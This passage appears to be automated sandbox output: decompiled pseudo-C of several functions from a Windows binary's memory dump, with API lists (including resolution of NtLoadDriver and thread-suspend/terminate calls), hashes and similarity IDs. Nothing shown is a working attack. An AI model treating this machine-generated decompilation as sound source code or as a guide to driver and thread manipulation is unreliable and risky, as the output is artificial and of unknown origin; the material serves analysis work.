                                                                                                                                                                                                                          					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                                                                                                                                                          				return E0040686C(_t131);
                                                                                                                                                                                                                          			}

                                                                                                                                                                                                                          0x00406a0b
                                                                                                                                                                                                                          0x00406a10
                                                                                                                                                                                                                          0x00406a16
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a25
                                                                                                                                                                                                                          0x00406a18
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a1e
                                                                                                                                                                                                                          0x00406a27
                                                                                                                                                                                                                          0x00406a2f
                                                                                                                                                                                                                          0x00406a32
                                                                                                                                                                                                                          0x00406a35
                                                                                                                                                                                                                          0x00406a3b
                                                                                                                                                                                                                          0x00406a41
                                                                                                                                                                                                                          0x00406a47
                                                                                                                                                                                                                          0x00406a4d
                                                                                                                                                                                                                          0x00406a53
                                                                                                                                                                                                                          0x00406a5d
                                                                                                                                                                                                                          0x00406a6d

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040696D
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040697E
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                                                                            • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                                                                                                                            • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                                                                            • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                                                                            • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 975042529-0
                                                                                                                                                                                                                          • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                                          			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                          				void _v56;
                                                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                                                          				char _v41548;
                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                          				void _t46;
                                                                                                                                                                                                                          				intOrPtr _t47;
                                                                                                                                                                                                                          				intOrPtr* _t64;
                                                                                                                                                                                                                          				intOrPtr* _t66;
                                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                                          				intOrPtr _t71;
                                                                                                                                                                                                                          				int _t77;
                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                          				void* _t81;
                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                          				void* _t83;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				E0040B550(0xa248, __ecx);
                                                                                                                                                                                                                          				_t77 = 0;
                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                          				E00408E31();
                                                                                                                                                                                                                          				_t40 =  *0x41c47c;
                                                                                                                                                                                                                          				if(_t40 != 0) {
                                                                                                                                                                                                                          					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if(_v8 == _t77) {
                                                                                                                                                                                                                          					_v8 = 0x186a0;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_v8 = _v8 + 0x3e80;
                                                                                                                                                                                                                          				_push(_v8);
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_t81 = _t40;
                                                                                                                                                                                                                          				_v20 = _t81;
                                                                                                                                                                                                                          				memset(_t81, _t77, _v8);
                                                                                                                                                                                                                          				_t83 = _t82 + 0x10;
                                                                                                                                                                                                                          				_v24 = _t77;
                                                                                                                                                                                                                          				E00408E31();
                                                                                                                                                                                                                          				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                                                                                                                                                          				L5:
                                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                                          					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                                                                                                                                                          						L16:
                                                                                                                                                                                                                          						_t46 =  *_t81;
                                                                                                                                                                                                                          						_t77 = 0;
                                                                                                                                                                                                                          						if(_t46 == 0) {
                                                                                                                                                                                                                          							_push(_v20);
                                                                                                                                                                                                                          							L0040B272();
                                                                                                                                                                                                                          							return _t46;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_t81 = _t81 + _t46;
                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t47 = _a4;
                                                                                                                                                                                                                          					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                                                                                                                                                          					_v12 = _t77;
                                                                                                                                                                                                                          					_v16 = _t71;
                                                                                                                                                                                                                          					if(_t71 <= _t77) {
                                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                                          						_t66 = 0;
                                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                                          						if(_t66 == 0) {
                                                                                                                                                                                                                          							E004090AF( &_v588);
                                                                                                                                                                                                                          							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                                                                                                                          							_t32 = _t81 + 0x20; // 0x20
                                                                                                                                                                                                                          							memcpy( &_v56, _t32, 8);
                                                                                                                                                                                                                          							_t83 = _t83 + 0x10;
                                                                                                                                                                                                                          							E004099ED(_a4 + 0x28,  &_v588);
                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                          							_t26 = _t66 + 4; // 0x4
                                                                                                                                                                                                                          							_t72 = _t26;
                                                                                                                                                                                                                          							if( *_t26 == 0) {
                                                                                                                                                                                                                          								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                                                                                                                                                          								_t28 = _t81 + 0x20; // 0x20
                                                                                                                                                                                                                          								memcpy(_t66 + 0x214, _t28, 8);
                                                                                                                                                                                                                          								_t83 = _t83 + 0x10;
                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L16;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                                                                                                                                                          					_t80 = _t47 + 0x28;
                                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                                          						_t64 = E00405A92(_v12, _t80);
                                                                                                                                                                                                                          						if( *_t64 == _t67) {
                                                                                                                                                                                                                          							break;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                          						if(_v12 < _v16) {
                                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_t66 = _t64;
                                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          			}


























                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                                                                                                                            • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409805
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040988A
                                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004098C0
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3641025914-0
                                                                                                                                                                                                                          • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                                                          			E004067AC(char** __edi) {
                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                          				void** _t11;
                                                                                                                                                                                                                          				char** _t15;
                                                                                                                                                                                                                          				char** _t24;
                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                          				char* _t28;
                                                                                                                                                                                                                          				char* _t29;
                                                                                                                                                                                                                          				char* _t30;
                                                                                                                                                                                                                          				char* _t31;
                                                                                                                                                                                                                          				char** _t33;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t24 = __edi;
                                                                                                                                                                                                                          				 *__edi = "cf@";
                                                                                                                                                                                                                          				_t9 = E00406746(__edi);
                                                                                                                                                                                                                          				_t28 = __edi[5];
                                                                                                                                                                                                                          				if(_t28 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t28);
                                                                                                                                                                                                                          					_push(_t28);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t29 = _t24[4];
                                                                                                                                                                                                                          				if(_t29 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t29);
                                                                                                                                                                                                                          					_push(_t29);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t30 = _t24[3];
                                                                                                                                                                                                                          				if(_t30 != 0) {
                                                                                                                                                                                                                          					_t9 = E004055D1(_t9, _t30);
                                                                                                                                                                                                                          					_push(_t30);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t31 = _t24[2];
                                                                                                                                                                                                                          				if(_t31 != 0) {
                                                                                                                                                                                                                          					E004055D1(_t9, _t31);
                                                                                                                                                                                                                          					_push(_t31);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t15 = _t24;
                                                                                                                                                                                                                          				_pop(_t32);
                                                                                                                                                                                                                          				_push(_t24);
                                                                                                                                                                                                                          				_t33 = _t15;
                                                                                                                                                                                                                          				_t25 = 0;
                                                                                                                                                                                                                          				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                                                                                                                                                          						_t25 = _t25 + 1;
                                                                                                                                                                                                                          					} while (_t25 < _t33[0xd]);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 =  *( *_t33)();
                                                                                                                                                                                                                          				free( *_t11);
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                                                                                                                                            • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                                                                                                                                          • free.MSVCRT(00000000), ref: 00406839
                                                                                                                                                                                                                            • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@$free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2241099983-0
                                                                                                                                                                                                                          • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                          			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                          				struct tagPOINT _v20;
                                                                                                                                                                                                                          				struct tagRECT _v36;
                                                                                                                                                                                                                          				int _t27;
                                                                                                                                                                                                                          				struct HWND__* _t30;
                                                                                                                                                                                                                          				struct HWND__* _t32;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t30 = _a4;
                                                                                                                                                                                                                          				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                                                                                          					_t32 = GetParent(_t30);
                                                                                                                                                                                                                          					GetWindowRect(_t30,  &_v20);
                                                                                                                                                                                                                          					GetClientRect(_t32,  &_v36);
                                                                                                                                                                                                                          					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                                                                                                                          					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                                                                                          					_v20.x = _t27;
                                                                                                                                                                                                                          					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                                                                                          					E00404FBB(_t30);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				return 1;
                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00405D0A
                                                                                                                                                                                                                          • GetWindowRect.USER32 ref: 00405D17
                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 00405D22
                                                                                                                                                                                                                          • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4247780290-0
                                                                                                                                                                                                                          • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                                                          			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                          				void* _t20;
                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                          				void* _t34;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t20 = __eax;
                                                                                                                                                                                                                          				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                          				_push(__ebx);
                                                                                                                                                                                                                          				_t28 = __eax - 1;
                                                                                                                                                                                                                          				L0040B26C();
                                                                                                                                                                                                                          				_v16 = __eax;
                                                                                                                                                                                                                          				if(_t28 > 0) {
                                                                                                                                                                                                                          					_t21 = _a4;
                                                                                                                                                                                                                          					_v8 = __ebx;
                                                                                                                                                                                                                          					_v8 =  ~_v8;
                                                                                                                                                                                                                          					_t32 = _t28 * __ebx + _t21;
                                                                                                                                                                                                                          					_a4 = _t21;
                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                          						memcpy(_v16, _a4, __ebx);
                                                                                                                                                                                                                          						memcpy(_a4, _t32, __ebx);
                                                                                                                                                                                                                          						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                                                                                                                                                          						_a4 = _a4 + __ebx;
                                                                                                                                                                                                                          						_t32 = _t32 + _v8;
                                                                                                                                                                                                                          						_t34 = _t34 + 0x24;
                                                                                                                                                                                                                          						_v12 = _v12 + 1;
                                                                                                                                                                                                                          						_t28 = _t28 - 1;
                                                                                                                                                                                                                          					} while (_t28 > _v12);
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_push(_v16);
                                                                                                                                                                                                                          				L0040B272();
                                                                                                                                                                                                                          				return _t20;
                                                                                                                                                                                                                          			}












                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$??2@??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1252195045-0
                                                                                                                                                                                                                          • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                                                                          			E00406746(void* __esi) {
                                                                                                                                                                                                                          				intOrPtr _t9;
                                                                                                                                                                                                                          				intOrPtr _t10;
                                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                                          				intOrPtr* _t18;
                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                          
                                                                                                                                                                                                                          				_t19 = __esi;
                                                                                                                                                                                                                          				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                                                                                                                                                          				if(_t9 != 0) {
                                                                                                                                                                                                                          					_push(_t9);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                                                                                                                                                          				if(_t10 != 0) {
                                                                                                                                                                                                                          					_push(_t10);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                                                                                                                                                          				if(_t11 != 0) {
                                                                                                                                                                                                                          					_push(_t11);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                                                                                                                                                          				if(_t18 != 0) {
                                                                                                                                                                                                                          					_t11 =  *_t18;
                                                                                                                                                                                                                          					if(_t11 != 0) {
                                                                                                                                                                                                                          						_push(_t11);
                                                                                                                                                                                                                          						L0040B272();
                                                                                                                                                                                                                          						 *_t18 = 0;
                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                          					_push(_t18);
                                                                                                                                                                                                                          					L0040B272();
                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                                                                                                                                                          				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                                                                                                                                                          				return _t11;
                                                                                                                                                                                                                          			}









                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.696208987.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696203819.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696217164.000000000040C000.00000002.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696222837.000000000040F000.00000004.00020000.sdmp
                                                                                                                                                                                                                          • Associated: 00000009.00000002.696228364.000000000041D000.00000002.00020000.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                                                          • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%
